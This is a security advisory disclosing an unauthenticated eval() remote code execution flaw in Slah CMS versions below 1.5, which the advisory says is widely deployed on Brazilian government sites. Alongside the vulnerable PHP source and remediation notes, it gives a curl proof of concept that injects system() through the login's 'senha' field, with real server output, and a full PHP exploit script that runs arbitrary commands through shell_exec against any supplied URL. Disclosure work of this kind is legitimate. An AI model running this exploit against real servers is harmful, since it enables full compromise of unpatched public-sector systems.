Slah Informática CMS < 1.5 RCE (Remote Code Execution)

Published on January 15, 2026

I - Advisory Information

Researcher : João Paulo de Oliveira Exploit Author : João Paulo de Oliveira Contact : contato[at]joaopaulodeoliveira[dot]dev Discovery Date : 2025-09-01 CVE ID : CVE-PENDING Risk Level : 10.0 Critical (CVSS v4.0)9.8 Critical (CVSS v3.1) CVSS v4 Vector : CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H CVSS v3 Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE Category : CWE-95 (Eval Injection) CWE Reference : https://cwe.mitre.org/data/definitions/95.html Status : Patched / Public Disclosure

II - Target Software Specifications

Application : Slah CMS Version : < 1.5 Platform : PHP Developer : Jhonatan Benetti Vendor : https://www.slah.com.br/ License : Proprietary (Commercial)

III - Executive Summary

A critical Remote Code Execution (RCE) vulnerability has been identified in Slah CMS, a software widely deployed in Brazilian governmental infrastructure (.gov.br) for institutional web management. The application fails to sanitize inputs before passing them to a dynamic evaluation function eval(). This flaw allows an unauthenticated remote attacker to execute arbitrary commands at the operating system level, leading to full system compromise and potentially impacting the integrity of public sector digital services.

IV - Technical Source Code Analysis

The vulnerability is located within the session management logic in config.php. The function session() accepts a key-value pair where the value is executed directly if a specific hardcoded key is provided.

function session($key, $value = null)
{
    if ($value != null) {
        $_SESSION[$key] = $value;
        // [REDACTED]: (not relevant to the RCE)
    }
    if ($key == '[email protected]' && $value != null) {
        eval($value);
    } else {
        return $_SESSION[$key] ?? null;
    }
}

Explanation: Regarding the config.php snippet above, the code lacks input validation or sandboxing. On line [61], the application checks for a specific identity string, if matched, line [62] executes the $value variable through eval(), allowing arbitrary code execution.

V - Proof Of Concept

The following cURL command demonstrates a successful exploitation of the identified vulnerability. By targeting the login endpoint, an unauthenticated attacker can inject a PHP system() function through the senha parameter. Due to the lack of input sanitization before the eval() call, various execution functions can be leveraged to achieve Remote Code Execution (RCE). Depending on the server's specific PHP configuration and enabled functions, the attacker can successfully utilize methods such as system(), shell_exec(), passthru(), or exec().

curl -X POST "https://[SUBDOMAIN].[DOMAIN].gov.br/login" \
          -H "Host: [SUBDOMAIN].[DOMAIN].gov.br" \
          -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" \
          -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \
          -H "Accept-Language: en-US,en;q=0.5" \
          -H "Accept-Encoding: gzip, deflate, br" \
          -H "Content-Type: application/x-www-form-urlencoded" \
          -H "Origin: https://[SUBDOMAIN].[DOMAIN].gov.br" \
          -H "Referer: https://[SUBDOMAIN].[DOMAIN].gov.br/login" \
          -H "Connection: keep-alive" \
          -b "PHPSESSID=[RANDOM_PHPSESSID]" \
          --data "[email protected]&;senha=system('uname -a ; uptime');"

Explanation: The provided curl command demonstrates the exploitation of the eval() vulnerability. The payload utilizes a semicolon to terminate any internal logic and force the execution of the injected PHP system() function. In this specific demonstration, the server is commanded to return its kernel information and current system uptime, proving full operating system interaction.
Output: Linux server65.srvlinux.info 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux 19:02:54 up 209 days, 3:39, 0 users, load average: 1.61, 1.63, 1.95

RCE — Figure 1 - Remote Code Execution PoC output showing command execution (**uname -a**, **uptime**).

RCE — Figure 2 - Remote Code Execution PoC output showing command execution (**cat /etc/passwd**).

DISCLAIMER: Evidence videos have been redacted to obscure target URLs and sensitive parameters to prevent unauthorized exposure and ensure responsible disclosure.

Video PoC: Remote Code Execution via system()

Video PoC: Remote Code Execution via exec()

Video PoC: Remote Code Execution via shell_exec()

VI - Exploitation

This script exploits an unauthenticated RCE in Slah CMS caused by an insecure eval() sink in config.php. By injecting OS commands via the senha parameter in a crafted POST request, the exploit bypasses sanitization to grant full system control.

VIEW FULL POC EXPLOIT

Full Exploit Code

<?php
/**
 * Usage:
 * php poc.php --url www.example.com --cmd id
 * php poc.php --url https://www.example.com --cmd id
 *
 * Notes:
 * - Fixed email: suportes@slah.com.br
 * - PHPSESSID: Randomized for each request (Unauthenticated RCE)
 * - Only URL and cmd vary by argument
 */
$options = getopt("", ["url:", "cmd:"]);
if (!isset($options['url'], $options['cmd'])) {
    echo "+------------------------------------------------------------------------+\n";
    echo "[+] RCE (Remote Code Execution)\n";
    echo "A critical code injection vulnerability was identified in the\n";
    echo "'session' function within config.php. The application\n";
    echo "implements an insecure logic gate that triggers an 'eval()'\n";
    echo "sink when a hardcoded administrative identifier is provided.\n";
    echo 'The lack of input sanitization on the "$value" (line 62) parameter' . "\n";
    echo "allows for unauthenticated, arbitrary PHP code execution,\n";
    echo "leading to complete server-side compromise.\n";
    echo "\n[*] Researcher: João Paulo de Oliveira\n";
    echo "[*] Exploit Author: João Paulo de Oliveira\n\n";
    echo "+------------------------------------------------------------------------+\n";
    echo '55    function session($key, $value = null)
56    {
57        if ($value != null) {
58            $_SESSION[$key] = $value;
59            // [REDACTED]: (not relevant to the RCE)
60        }
61        if($key == \'[email protected]\' && $value != null){
62            eval($value);
63        }else{
64            return $_SESSION[$key] ?? null;
65        }
66    }';
    echo "\n+------------------------------------------------------------------------+\n\n";
    echo "[*] 2025-09-01 - Vulnerability identified\n";
    echo "[*] 2025-09-02 - Initial contact with vendor\n";
    echo "[*] 2025-09-02 - Vendor acknowledged and requested details\n";
    echo "[*] 2025-09-03 - Technical details and mitigation provided\n";
    echo "[*] 2026-01-05 - Official patch released by vendor\n";
    echo "[*] 2026-01-15 - CVE ID requested and disclosure initiated\n";
    echo "+------------------------------------------------------------------------+\n";
    echo "Usage:\n";
    echo "php " . $argv[0] . " --url painel.site.com --cmd command\n";
    exit(1);
}
$raw_url = $options['url'];
// If the URL has no protocol (http/https), it adds https://
if (!preg_match('#^https?://#i', $raw_url)) {
    $raw_url = "https://" . $raw_url;
}
$url = rtrim($raw_url, "/");
$host = parse_url($url, PHP_URL_HOST);
$login_url = $url . "/login";
// Payload injection
$post_fields = http_build_query([
    "email" => "[email protected]",
    "senha" => "echo shell_exec('" . implode(' ', array_slice($argv, array_search('--cmd', $argv) + 1)) . "');"
]);
// Request Headers
$headers = [
    "Host: $host",
    "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-US,en;q=0.5",
    "Accept-Encoding: gzip, deflate, br",
    "Content-Type: application/x-www-form-urlencoded",
    "Origin: $url",
    "Referer: $url/login",
    "Connection: keep-alive"
];
// Generates a random session ID to prove unauthenticated RCE
$random_session = md5(uniqid(rand(), true));
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $login_url,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => $post_fields,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HTTPHEADER     => $headers,
    CURLOPT_COOKIE         => "PHPSESSID=" . $random_session,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_TIMEOUT        => 15
]);
// Execute the request and get the response
$response = curl_exec($ch);
// Filter out HTML alerts and error messages
$response = preg_replace('/<p class="alert.*?<\/p>/s', '', $response);
if (curl_errno($ch)) {
    echo "[!] cURL error: " . curl_error($ch) . "\n";
} else {
    // Visual only, simulating a bash shell
    echo "poc@poc:~$ " . trim($response) . "\n";
}
curl_close($ch);

RCE — Figure 3 - Automated PoC showcasing the functional exploit in action.

VII - Remediation & Mitigation

Primary solution: update the Slah CMS to the latest patched version available from the vendor.
Technical recommendation (code fix): the eval() construct should be strictly avoided as it is inherently insecure for handling dynamic logic. Replace it with a secure switch-case or a whitelist-based mapping to ensure user input is never executed as code.

VIII - Vulnerability Disclosure Timeline

2025-09-01 - Vulnerability identification and internal analysis.
2025-09-02 - Initial contact with the vendor.
2025-09-02 - Vendor acknowledged contact and requested technical details.
2025-09-03 - Detailed vulnerability report and remediation guidance provided.
2026-01-05 - Official patch released by the vendor.
2026-01-15 - CVE ID requested and disclosure process initiated.

Back